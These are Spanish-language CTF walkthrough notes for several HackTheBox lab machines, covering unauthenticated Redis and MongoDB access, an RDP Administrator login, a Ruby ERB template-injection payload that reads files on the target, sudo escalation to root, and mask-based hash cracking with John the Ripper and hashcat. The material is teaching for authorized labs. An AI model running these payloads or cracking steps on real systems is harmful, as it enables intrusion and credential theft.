HACKTHEBOX
REDEEMER (VERY EASY)
Sistema Redis:
nc -vn IP 6379 -> te conecta nc=ncat
Encontrar credenciales-> AUTH admin (probamos admin, no tiene pass -> ya estamos
dentro)
Enumeracion ->
-INFO
-client list
-CONFIG GET*
Dentro de la base de datos (keyspace)->
-INFO keyspace -> en este caso es la database 0
-SELECT 0 (numero database)
Ya nos sale una key que se llama flag -> GET flag
EXPLOSION (VERY EASY)
3389TCP ---> rdp, en este caso usaremos la rdp de xfreerdp
Nos conectamos con el siguiente comando --> xfreerdp /v:IP /cert-ignore
/u:Administrator
/v:ip -> especifica la ip que quieres conectarte
/cert-ignore -> ignora todos los certificados
MONGOD( VERY EASY)
Te logeas sabiendo usando el HOST (IP de la maquina):
mongo <HOST>
Haces los siguientes comandos para ver databases y te encuentras que hay una llamda
sensitive_information
show dbs
use <sensitive_information>
show collections -> te encuentras collection=Flag
db.<collection>.find() #Dump the collection
db.<collection>.count() #Number of records of the collection
[Link]({"username":"admin"}) #Find in current db the username admin
PERFECTION (EASY)
El NMAP te devuelve que es el puerto 80, buscas la pagina en internet
Dentro del BURPSUITE navegas por la pagina y en la del formulario la mandas a
repeater y en el formulario vas cambiando el category con URL-encoded format --->
[Link]
1º: <%= [Link]('/') %> --> lista los ficheros que tiene, ves que tiene usr,
home y root, pruebas los 3
2º: <%= [Link]('/home') %> ---> ves que en home tiene el user susan
3ª: <%= [Link]('/home/susan') %> ---> ves que tiene el fichero [Link]
4º: <%= [Link]('/home/susan/[Link]').read %> ---> te da la flag
sudo -l ---> te muestra todos lo que puede ejecutar siendo root
sudo su ---> te escala a root
JOHNTHERIPPER--->
.\[Link] .\[Link] --mask=susan_nasus_?d?d?d?d?d?d?d?d?d --format=Raw-SHA256
--> --mask= si sabes algo en concreto de la password, en este caso sabes que
empieza por susan_nasus y va del 1 al [Link] de hay que sea ?d?d?d?d?d?d?d?
d?d --format= añades el formato del hash esto lo buscas en ->
[Link]
--mask -> son 9 numeros por lo tanto es d y una ? delante por cada d
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
HASHCAT ---->
hashcat -a 3 -m 1400
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f "susan_nasus_?d?d?
d?d?d?d?d?d?d"
-m 1400 = porque el hash es tipo Raw-SHA256, sacas que es 1400 de aqui
[Link]
-a 3 = siempre a menos que quieras meter una rule que seria= -a 0